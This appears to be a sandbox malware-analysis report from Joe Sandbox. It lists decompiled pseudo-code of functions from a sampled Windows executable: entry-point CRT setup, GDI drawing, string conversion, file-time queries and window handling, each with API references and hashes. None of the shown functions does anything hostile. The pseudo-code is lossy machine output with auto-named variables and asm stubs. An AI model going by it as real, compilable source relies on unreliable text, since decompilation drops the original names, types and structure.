                                            					_t67 = _v16;
                                            				}
                                            				E00423C5A( *((intOrPtr*)(_t76 + 0x84)), _t97,  &_v40, _v24, _v20, _t76 + 0xc,  *((intOrPtr*)(_t76 + 0x1c)),  *((intOrPtr*)(_t76 + 0x20)), _v12, _t67);
                                            				asm("movsd");
                                            				 *((intOrPtr*)(_t76 + 0x1c)) = _v24;
                                            				asm("movsd");
                                            				asm("movsd");
                                            				 *((intOrPtr*)(_t76 + 0x20)) = _v20;
                                            				asm("movsd");
                                            				_t73 = 0 | _v12 == _v8;
                                            				 *(_t76 + 0x24) = _t73;
                                            				return _t73;
                                            			}



















                                            APIs
                                            • GetStockObject.GDI32(00000000), ref: 00420090
                                              • Part of subcall function 00423BE7: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,004200A6), ref: 00423C26
                                              • Part of subcall function 00423BE7: CreatePatternBrush.GDI32(00000000), ref: 00423C33
                                              • Part of subcall function 00423BE7: DeleteObject.GDI32(00000000), ref: 00423C3F
                                            • GetSystemMetrics.USER32 ref: 004200D6
                                            • GetSystemMetrics.USER32 ref: 004200DE
                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 00420134
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: CreateMetricsObjectSystem$BitmapBrushDeleteInflatePatternRectStock
                                            • String ID:
                                            • API String ID: 419749085-0
                                            • Opcode ID: f04683a99d2cf70874936f412b73c80b9557d256e680e15b78c8faeb2f1dfe54
                                            • Instruction ID: e0589e39635e5819ef82d448fd258ad5fc30fad598c9d44a8e29054fd3acad8a
                                            • Opcode Fuzzy Hash: f04683a99d2cf70874936f412b73c80b9557d256e680e15b78c8faeb2f1dfe54
                                            • Instruction Fuzzy Hash: 1B413D71E006289BCF11CFA4D984BAEBBF5AF09310F514166ED10BB296D3B59E41CF94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 93%
                                            			E0040EB45(short* _a4, char* _a8, intOrPtr _a12, char* _a16, intOrPtr* _a20) {
                                            				intOrPtr* _t29;
                                            				int _t30;
                                            				void* _t32;
                                            				signed int _t33;
                                            				int _t35;
                                            				signed short* _t38;
                                            				short* _t39;
                                            				intOrPtr _t41;
                                            				intOrPtr _t42;
                                            				int _t46;
                                            				signed char _t50;
                                            				char* _t53;
                                            				char* _t54;
                                            
                                            				_t53 = _a8;
                                            				if(_t53 == 0 || _a12 == 0) {
                                            					L5:
                                            					return 0;
                                            				} else {
                                            					_t50 =  *_t53;
                                            					if(_t50 != 0) {
                                            						_t29 = _a20;
                                            						if(_t29 != 0) {
                                            							_t42 =  *_t29;
                                            							_t30 =  *(_t29 + 4);
                                            						} else {
                                            							_t42 =  *0x439eec; // 0x0
                                            							_t30 =  *0x439efc; // 0x0
                                            						}
                                            						if(_t42 != 0) {
                                            							_t54 = _a16;
                                            							if( *_t54 == 0) {
                                            								_t41 =  *0x437100; // 0x43710a
                                            								if(( *(_t41 + 1 + (_t50 & 0x000000ff) * 2) & 0x00000080) == 0) {
                                            									if(MultiByteToWideChar(_t30, 9, _t53, 1, _a4, 0 | _a4 != 0x00000000) != 0) {
                                            										goto L13;
                                            									}
                                            									L21:
                                            									_t33 = E00406F78();
                                            									 *_t33 = 0x2a;
                                            									return _t33 | 0xffffffff;
                                            								}
                                            								_t46 =  *0x43730c; // 0x1
                                            								if(_a12 >= _t46) {
                                            									if(_t46 <= 1 || MultiByteToWideChar(_t30, 9, _t53, _t46, _a4, 0 | _a4 != 0x00000000) == 0) {
                                            										if(_t53[1] != 0) {
                                            											goto L19;
                                            										}
                                            										 *_t54 =  *_t54 & 0x00000000;
                                            										goto L21;
                                            									} else {
                                            										L19:
                                            										_t35 =  *0x43730c; // 0x1
                                            										return _t35;
                                            									}
                                            								}
                                            								 *_t54 = _t50;
                                            								_push(0xfffffffe);
                                            								goto L14;
                                            							}
                                            							_t54[1] = _t50;
                                            							if( *0x43730c <= 1 || MultiByteToWideChar(_t30, 9, _t54, 2, _a4, 0 | _a4 != 0x00000000) == 0) {
                                            								 *_t54 = 0;
                                            								goto L21;
                                            							} else {
                                            								 *_t54 = 0;
                                            								goto L19;
                                            							}
                                            						} else {
                                            							_t38 = _a4;
                                            							if(_t38 != 0) {
                                            								 *_t38 = _t50 & 0x000000ff;
                                            							}
                                            							L13:
                                            							_push(1);
                                            							L14:
                                            							_pop(_t32);
                                            							return _t32;
                                            						}
                                            					} else {
                                            						_t39 = _a4;
                                            						if(_t39 != 0) {
                                            							 *_t39 = 0;
                                            						}
                                            						goto L5;
                                            					}
                                            				}
                                            			}

















                                            APIs
                                            • MultiByteToWideChar.KERNEL32(00000006,00000009,?,00000002,00000000,00000000,73B770F0,0043B508,00000000,?,0040EB26,00000000,00000002,?,?,?), ref: 0040EBC5
                                            • MultiByteToWideChar.KERNEL32(00000006,00000009,00000002,00000001,00000000,00000000,73B770F0,0043B508,00000000,?,0040EB26,00000000,00000002,?,?,?), ref: 0040EC21
                                            • MultiByteToWideChar.KERNEL32(00000006,00000009,00000002,00000001,00000000,00000000,73B770F0,0043B508,00000000,?,0040EB26,00000000,00000002,?,?,?), ref: 0040EC48
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWide
                                            • String ID: qC
                                            • API String ID: 626452242-723977305
                                            • Opcode ID: 9b978aa82f3ed8b50052fab243b56dbffd9d8b2fb8176b7af756b45fab2e9ea7
                                            • Instruction ID: c9bfa79667547676a2f9c640e0e00b1591e9fa3c2d1d8cd3a8b3004187d1f30f
                                            • Opcode Fuzzy Hash: 9b978aa82f3ed8b50052fab243b56dbffd9d8b2fb8176b7af756b45fab2e9ea7
                                            • Instruction Fuzzy Hash: FC31A070204206EFDB20CF22DCC4A6A3BB5AB41711F14893EE5439A2D1E378ECA1D759
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 73%
                                            			E004040A0(struct HDC__* _a4, int _a8, int _a12, struct HDC__* _a16, int _a20, int _a24, signed int _a28, signed int _a32, intOrPtr _a36, signed int _a40) {
                                            				signed int _v8;
                                            				signed int _v12;
                                            				signed int _v16;
                                            				signed int _v20;
                                            				signed int _v24;
                                            				signed int _t83;
                                            				signed int _t85;
                                            				void* _t126;
                                            				void* _t128;
                                            
                                            				if(_a40 < 4) {
                                            					_a40 = 4;
                                            				}
                                            				asm("cdq");
                                            				_v8 = _a28 / _a40 + 1;
                                            				asm("cdq");
                                            				_v12 = _a32 / _a40 + 1;
                                            				E004061D5(E00406204(0));
                                            				_t128 = _t126 + 8;
                                            				_v16 = _v8 * _v12;
                                            				while(_v16 > 0) {
                                            					_t83 = E004061E2();
                                            					asm("cdq");
                                            					_v20 = _t83 % _v8;
                                            					_t85 = E004061E2();
                                            					asm("cdq");
                                            					_v24 = _t85 % _v12;
                                            					BitBlt(_a16, _a20 + _v20 * _a40, _a24 + _v24 * _a40, _a40, _a40, _a4, _a8 + _v20 * _a40, _a12 + _v24 * _a40, 0xcc0020);
                                            					asm("cdq");
                                            					if(_v16 % 0xa == 0) {
                                            						E0040381D(_a36);
                                            						_t128 = _t128 + 4;
                                            					}
                                            					_v16 = _v16 - 1;
                                            				}
                                            				BitBlt(_a16, _a20, _a24, _a28, _a32, _a4, _a8, _a12, 0xcc0020);
                                            				return 1;
                                            			}












                                            APIs
                                            • _rand.LIBCMT ref: 004040F4
                                            • _rand.LIBCMT ref: 00404100
                                            • BitBlt.GDI32(?,?,?,?,?,?,00000000,?,00CC0020), ref: 00404155
                                            • BitBlt.GDI32(?,?,?,00CC0020,?,?,00000000,?,00CC0020), ref: 004041A9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: _rand
                                            • String ID:
                                            • API String ID: 1172538735-0
                                            • Opcode ID: a2d48083adc6e386331021ddbb1d8997b7df1032238b4ade521697a42fa36f33
                                            • Instruction ID: ed2ed6788aa4e0fa1879982426311b249628acefad2a4dc112bdad2b7b6bc882
                                            • Opcode Fuzzy Hash: a2d48083adc6e386331021ddbb1d8997b7df1032238b4ade521697a42fa36f33
                                            • Instruction Fuzzy Hash: C83107B5A00109EFCB04DF99C985EEE77B9EF9C308F118269F919A7240D634EA10CF95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E004293D9(void* __ecx) {
                                            				INT* _t43;
                                            				CHAR* _t44;
                                            				CHAR* _t47;
                                            				CHAR* _t65;
                                            				void* _t76;
                                            				void* _t81;
                                            				void* _t83;
                                            
                                            				E00406520(E0042A890, _t81);
                                            				_t43 =  *(_t81 + 0x20);
                                            				_t65 = 0;
                                            				 *((intOrPtr*)(_t81 - 0x10)) = _t83 - 0x20;
                                            				_t76 = __ecx;
                                            				 *(_t81 - 0x14) = 0;
                                            				 *((intOrPtr*)(_t81 - 0x18)) = 0;
                                            				if(_t43 != 0) {
                                            					L4:
                                            					_t44 = ExtTextOutA( *(_t76 + 4),  *(_t81 + 8),  *(_t81 + 0xc),  *(_t81 + 0x10),  *(_t81 + 0x14),  *(_t81 + 0x18),  *(_t81 + 0x1c), _t43);
                                            					 *(_t81 + 0x18) = _t44;
                                            					if( *((intOrPtr*)(_t81 - 0x18)) != 0 && _t44 != 0 && (GetTextAlign( *(_t76 + 8)) & 0x00000001) != 0) {
                                            						GetCurrentPositionEx( *(_t76 + 4), _t81 - 0x20);
                                            						E0041A1BF(_t76, _t81 - 0x28,  *(_t81 - 0x20) -  *((intOrPtr*)(_t81 - 0x18)),  *((intOrPtr*)(_t81 - 0x1c)));
                                            					}
                                            					E00413206( *(_t81 - 0x14));
                                            					E00413206(_t65);
                                            					_t47 =  *(_t81 + 0x18);
                                            				} else {
                                            					if( *(_t81 + 0x1c) != 0) {
                                            						 *(_t81 - 4) = 0;
                                            						 *(_t81 - 0x14) = E004131DD( *(_t81 + 0x1c) << 2);
                                            						_t65 = E004131DD( *(_t81 + 0x1c));
                                            						 *(_t81 - 4) =  *(_t81 - 4) | 0xffffffff;
                                            						E0042914E(_t76, _t81 - 0x20, _t81 + 8,  *(_t81 + 0x18), _t81 + 0x1c, 0, 0, 0, 0, _t65,  *(_t81 - 0x14), _t81 - 0x18);
                                            						_t43 =  *(_t81 - 0x14);
                                            						 *(_t81 + 0x18) = _t65;
                                            						goto L4;
                                            					} else {
                                            						_t47 = 1;
                                            					}
                                            				}
                                            				 *[fs:0x0] =  *((intOrPtr*)(_t81 - 0xc));
                                            				return _t47;
                                            			}










                                            APIs
                                            • __EH_prolog.LIBCMT ref: 004293DE
                                            • ExtTextOutA.GDI32(?,?,?,?,?,?,?,?), ref: 0042946C
                                            • GetTextAlign.GDI32(?), ref: 00429481
                                            • GetCurrentPositionEx.GDI32(?,?), ref: 00429492
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Text$AlignCurrentH_prologPosition
                                            • String ID:
                                            • API String ID: 2331262098-0
                                            • Opcode ID: ba3f12c094f1310c0665f5f126d81fc9c6abdaded98a66113d688dd55281fba0
                                            • Instruction ID: d4a08c63824a92c840afe16e88adb87e11ee856b7d6374c0f69a009a87428bbd
                                            • Opcode Fuzzy Hash: ba3f12c094f1310c0665f5f126d81fc9c6abdaded98a66113d688dd55281fba0
                                            • Instruction Fuzzy Hash: 60311872A0411AAFCF219F95DC45CEF7F79FF08350F10411AF915A2250C7399A61DBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E004181F2(void* __ecx, char _a4) {
                                            				struct _FILETIME _v12;
                                            				struct _FILETIME _v20;
                                            				struct _FILETIME _v28;
                                            				void* _t29;
                                            				void* _t30;
                                            				long _t33;
                                            				long _t34;
                                            				intOrPtr _t43;
                                            				signed int _t45;
                                            				signed int _t46;
                                            				void* _t54;
                                            				CHAR* _t55;
                                            				intOrPtr* _t56;
                                            
                                            				_t56 = _a4;
                                            				_t54 = __ecx;
                                            				E00406330(_t56, 0, 0x118);
                                            				_t2 = _t56 + 0x12; // 0x4181ee
                                            				lstrcpynA(_t2,  *(_t54 + 0xc), 0x104);
                                            				_t29 =  *(_t54 + 4);
                                            				_t46 = _t45 | 0xffffffff;
                                            				if(_t29 == _t46) {
                                            					L12:
                                            					_t30 = 1;
                                            					return _t30;
                                            				}
                                            				if(GetFileTime(_t29,  &_v12,  &_v20,  &_v28) == 0) {
                                            					L3:
                                            					return 0;
                                            				}
                                            				_t33 = GetFileSize( *(_t54 + 4), 0);
                                            				 *(_t56 + 0xc) = _t33;
                                            				if(_t33 != _t46) {
                                            					_t55 =  *(_t54 + 0xc);
                                            					if( *((intOrPtr*)(_t55 - 8)) != 0) {
                                            						_t34 = GetFileAttributesA(_t55);
                                            						if(_t34 == _t46) {
                                            							goto L5;
                                            						}
                                            						 *(_t56 + 0x10) = _t34;
                                            						L8:
                                            						 *_t56 =  *((intOrPtr*)(E00410A21( &_a4,  &_v12, _t46)));
                                            						 *((intOrPtr*)(_t56 + 8)) =  *((intOrPtr*)(E00410A21( &_a4,  &_v20, _t46)));
                                            						_t43 =  *((intOrPtr*)(E00410A21( &_a4,  &_v28, _t46)));
                                            						 *((intOrPtr*)(_t56 + 4)) = _t43;
                                            						if( *_t56 == 0) {
                                            							 *_t56 = _t43;
                                            						}
                                            						if( *((intOrPtr*)(_t56 + 8)) == 0) {
                                            							_t24 = _t56 + 4; // 0xfffef685
                                            							 *((intOrPtr*)(_t56 + 8)) =  *_t24;
                                            						}
                                            						goto L12;
                                            					}
                                            					L5:
                                            					 *(_t56 + 0x10) =  *(_t56 + 0x10) & 0x00000000;
                                            					goto L8;
                                            				}
                                            				goto L3;
                                            			}
















                                            APIs
                                            • lstrcpynA.KERNEL32(004181EE,?,00000104,?,?,?,?,?,?,?,004181DC,?), ref: 0041821C
                                            • GetFileTime.KERNEL32(00000000,004181DC,?,?,?,?,?,?,?,?,?,004181DC,?), ref: 0041823D
                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,004181DC,?), ref: 0041824C
                                            • GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,?,004181DC,?), ref: 0041826D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: File$AttributesSizeTimelstrcpyn
                                            • String ID:
                                            • API String ID: 1499663573-0
                                            • Opcode ID: dbecba43a928303c581e8da2cb8fd19ac9e6fcc8953e2d36976d88af1ab38ca6
                                            • Instruction ID: 4fe2cb551854f978d009958c1be7b26df4981621a34b5ca5644a38b106d1dacc
                                            • Opcode Fuzzy Hash: dbecba43a928303c581e8da2cb8fd19ac9e6fcc8953e2d36976d88af1ab38ca6
                                            • Instruction Fuzzy Hash: 2D318F76600605AFC721DFA0C885BEBB7B8FF24310F10496EE556D7290EB74A985CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 83%
                                            			_entry_(void* __ebx, void* __edi, void* __esi) {
                                            				CHAR* _v8;
                                            				intOrPtr* _v24;
                                            				intOrPtr _v28;
                                            				struct _STARTUPINFOA _v96;
                                            				intOrPtr _v100;
                                            				intOrPtr _v104;
                                            				intOrPtr _v108;
                                            				unsigned int _t15;
                                            				signed int _t27;
                                            				signed int _t35;
                                            				intOrPtr _t52;
                                            
                                            				_t47 = __edi;
                                            				_push(0xffffffff);
                                            				_push(0x42f100);
                                            				_push(E00409800);
                                            				_push( *[fs:0x0]);
                                            				 *[fs:0x0] = _t52;
                                            				_push(__edi);
                                            				_v28 = _t52 - 0x58;
                                            				_t15 = GetVersion();
                                            				 *0x439d04 = 0;
                                            				_t35 = _t15 & 0x000000ff;
                                            				 *0x439d00 = _t35;
                                            				 *0x439cfc = _t35 << 8;
                                            				 *0x439cf8 = _t15 >> 0x10;
                                            				if(E0040796F(1) == 0) {
                                            					E004064B5(0x1c);
                                            				}
                                            				if(E00408DEC() == 0) {
                                            					E004064B5(0x10);
                                            				}
                                            				_v8 = 0;
                                            				E0040963B();
                                            				 *0x43b87c = GetCommandLineA();
                                            				 *0x439ce8 = E00409509();
                                            				E004092BC();
                                            				E00409203();
                                            				E00406619();
                                            				_v96.dwFlags = 0;
                                            				GetStartupInfoA( &_v96);
                                            				_v104 = E004091AB();
                                            				_t56 = _v96.dwFlags & 0x00000001;
                                            				if((_v96.dwFlags & 0x00000001) == 0) {
                                            					_t27 = 0xa;
                                            				} else {
                                            					_t27 = _v96.wShowWindow & 0x0000ffff;
                                            				}
                                            				_v100 = E0040EC99(GetModuleHandleA(0), 0, _v104, _t27);
                                            				E00406646(_t29);
                                            				_t31 = _v24;
                                            				_t40 =  *((intOrPtr*)( *_v24));
                                            				_v108 =  *((intOrPtr*)( *_v24));
                                            				return E00409033(_t47, _t56, _t40, _t31);
                                            			}














                                            APIs
                                            • GetVersion.KERNEL32 ref: 004063AE
                                              • Part of subcall function 0040796F: HeapCreate.KERNELBASE(00000000,00001000,00000000,004063E6,00000001), ref: 00407980
                                              • Part of subcall function 0040796F: HeapDestroy.KERNEL32 ref: 0040799E
                                            • GetCommandLineA.KERNEL32 ref: 0040640E
                                            • GetStartupInfoA.KERNEL32(?), ref: 00406439
                                            • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 0040645C
                                              • Part of subcall function 004064B5: ExitProcess.KERNEL32 ref: 004064D2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                            • String ID:
                                            • API String ID: 2057626494-0
                                            • Opcode ID: 8203cef856ffdf5330fa23f021acb3231cccc4167ef851cc0875824ae4c609d5
                                            • Instruction ID: c51f859c3b4423f550283f3a037e6d2f417254e4b3c57e688e880ffcfc58db2c
                                            • Opcode Fuzzy Hash: 8203cef856ffdf5330fa23f021acb3231cccc4167ef851cc0875824ae4c609d5
                                            • Instruction Fuzzy Hash: 952174B1940715AAD718AFB6EC46A6D7BB8EF44704F10453FF902AA2D2DB7C4811CB9C
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 48%
                                            			E00421DA3() {
                                            				intOrPtr _t25;
                                            				struct HWND__* _t26;
                                            				struct HWND__* _t43;
                                            				struct HWND__** _t50;
                                            				void* _t52;
                                            
                                            				E00406520(E0042A3D8, _t52);
                                            				_t25 =  *0x436980; // 0x436994
                                            				 *((intOrPtr*)(_t52 - 0x10)) = _t25;
                                            				_t50 =  *(_t52 + 0xc);
                                            				_t26 = _t50[2];
                                            				_t43 = _t50[1];
                                            				 *(_t52 - 4) = 0;
                                            				if(_t26 != 0xfffffdf8 || (_t50[0x19] & 0x00000001) == 0) {
                                            					if(_t26 == 0xfffffdee && (_t50[0x2d] & 0x00000001) != 0) {
                                            						goto L4;
                                            					}
                                            				} else {
                                            					L4:
                                            					_t43 = GetDlgCtrlID(_t43) & 0x0000ffff;
                                            				}
                                            				if(_t43 == 0) {
                                            					L8:
                                            					_push(0x50);
                                            					_push( *((intOrPtr*)(_t52 - 0x10)));
                                            					_push( &(_t50[4]));
                                            					if(_t50[2] != 0xfffffdf8) {
                                            						E00416D78();
                                            					} else {
                                            						lstrcpynA();
                                            					}
                                            					 *((intOrPtr*)( *((intOrPtr*)(_t52 + 0x10)))) = 0;
                                            					SetWindowPos( *_t50, 0, 0, 0, 0, 0, 0x213);
                                            					_push(1);
                                            					_pop(0);
                                            				} else {
                                            					if(E00417298(_t43, _t52 - 0x110, 0x100) != 0) {
                                            						E004172BF(_t52 - 0x10, _t52 - 0x110, 1, 0xa);
                                            						goto L8;
                                            					}
                                            				}
                                            				 *(_t52 - 4) =  *(_t52 - 4) | 0xffffffff;
                                            				E00416AEC(_t52 - 0x10);
                                            				 *[fs:0x0] =  *((intOrPtr*)(_t52 - 0xc));
                                            				return 0;
                                            			}









                                            APIs
                                            • __EH_prolog.LIBCMT ref: 00421DA8
                                            • GetDlgCtrlID.USER32 ref: 00421DEC
                                            • lstrcpynA.KERNEL32(?,?,00000050), ref: 00421E31
                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000213), ref: 00421E52
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: CtrlH_prologWindowlstrcpyn
                                            • String ID:
                                            • API String ID: 2888839504-0
                                            • Opcode ID: e883827794f995750d8e0748482c4f524e8e7c9e824d21524573c760b701934f
                                            • Instruction ID: 51cd8aa0e5dd28eac912709b930bb33ded5dc075b1ee3252d35fc9d3b9766125
                                            • Opcode Fuzzy Hash: e883827794f995750d8e0748482c4f524e8e7c9e824d21524573c760b701934f
                                            • Instruction Fuzzy Hash: D8219071600215ABCB30DB65DC85BABB7B8BF14314F44452EF952922E0D3B4A940CA14
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 95%
                                            			E0040BF2C(void* __ecx) {
                                            				int _t30;
                                            				void* _t40;
                                            				int _t42;
                                            				short* _t44;
                                            				int _t45;
                                            				int _t48;
                                            				void* _t49;
                                            				short* _t51;
                                            
                                            				_t40 = __ecx;
                                            				_t51 =  *(_t49 - 0x18);
                                            				 *(_t49 - 0x24) = 0;
                                            				 *(_t49 - 4) =  *(_t49 - 4) | 0xffffffff;
                                            				_t45 =  *(_t49 + 0x14);
                                            				_t42 = 1;
                                            				if( *(_t49 - 0x24) == 0 || MultiByteToWideChar( *(_t49 + 0x20), _t42,  *(_t49 + 0x10), _t45,  *(_t49 - 0x24),  *(_t49 - 0x1c)) == 0) {
                                            					L8:
                                            					_t30 = 0;
                                            				} else {
                                            					_t48 = MultiByteToWideChar( *(_t49 + 0x20), 9,  *(_t49 + 0x18),  *(_t49 + 0x1c), 0, 0);
                                            					 *(_t49 - 0x20) = _t48;
                                            					if(_t48 == 0) {
                                            						goto L8;
                                            					} else {
                                            						 *(_t49 - 4) = _t42;
                                            						E00406830(_t48 + _t48 + 0x00000003 & 0x000000fc, _t40);
                                            						 *(_t49 - 0x18) = _t51;
                                            						_t44 = _t51;
                                            						 *(_t49 - 0x28) = _t44;
                                            						 *(_t49 - 4) =  *(_t49 - 4) | 0xffffffff;
                                            						if(_t44 == 0 || MultiByteToWideChar( *(_t49 + 0x20), 1,  *(_t49 + 0x18),  *(_t49 + 0x1c), _t44, _t48) == 0) {
                                            							goto L8;
                                            						} else {
                                            							_t30 = CompareStringW( *(_t49 + 8),  *(_t49 + 0xc),  *(_t49 - 0x24),  *(_t49 - 0x1c), _t44, _t48);
                                            						}
                                            					}
                                            				}
                                            				 *[fs:0x0] =  *((intOrPtr*)(_t49 - 0x10));
                                            				return _t30;
                                            			}












                                            APIs
                                            • MultiByteToWideChar.KERNEL32(?,00000001,00000000,0000000B,?,?,?,0040A577), ref: 0040BF5B
                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,?,00000000,00000000,00000000,?,0040A577), ref: 0040BF6E
                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,?,00000000,?,0040A577), ref: 0040BFBA
                                            • CompareStringW.KERNEL32(?,?,00000000,00000000,?,00000000,?,00000000,?,0040A577), ref: 0040BFD2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWide$CompareString
                                            • String ID:
                                            • API String ID: 376665442-0
                                            • Opcode ID: 457da201d333a445e7be22f73c5e8df3eb2b5babfed425308593c8da7e39ea65
                                            • Instruction ID: 5efc645efc17fcc534c18c6f6ed6037a474d66dfe24f988aec16bcf1503d57bf
                                            • Opcode Fuzzy Hash: 457da201d333a445e7be22f73c5e8df3eb2b5babfed425308593c8da7e39ea65
                                            • Instruction Fuzzy Hash: 3621FA3290021AEBCF218F84CD459DE7FB6FB48750F10416AFA11B21A0C3359962DB98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0041837E(intOrPtr _a4, struct _FILETIME* _a8) {
                                            				struct _FILETIME _v12;
                                            				struct _SYSTEMTIME _v28;
                                            				void* __edi;
                                            				void* __esi;
                                            				void* __ebp;
                                            				intOrPtr* _t30;
                                            				int _t36;
                                            				void* _t50;
                                            
                                            				_t47 = _a4;
                                            				_v28.wYear =  *((intOrPtr*)(E00410A6D(_a4, 0, 0) + 0x14)) + 0x76c;
                                            				_v28.wMonth =  *((intOrPtr*)(E00410A6D(_t47, 0, 0) + 0x10)) + 1;
                                            				_v28.wDay =  *((intOrPtr*)(E00410A6D(_t47, 0, 0) + 0xc));
                                            				_v28.wHour =  *((intOrPtr*)(E00410A6D(_t47, 0, 0) + 8));
                                            				_v28.wMinute =  *((intOrPtr*)(E00410A6D(_t47, 0, 0) + 4));
                                            				_t30 = E00410A6D(_t47, 0, 0);
                                            				_v28.wMilliseconds = 0;
                                            				_v28.wSecond =  *_t30;
                                            				if(SystemTimeToFileTime( &_v28,  &_v12) == 0) {
                                            					E00417D15(_t50, GetLastError(), 0);
                                            				}
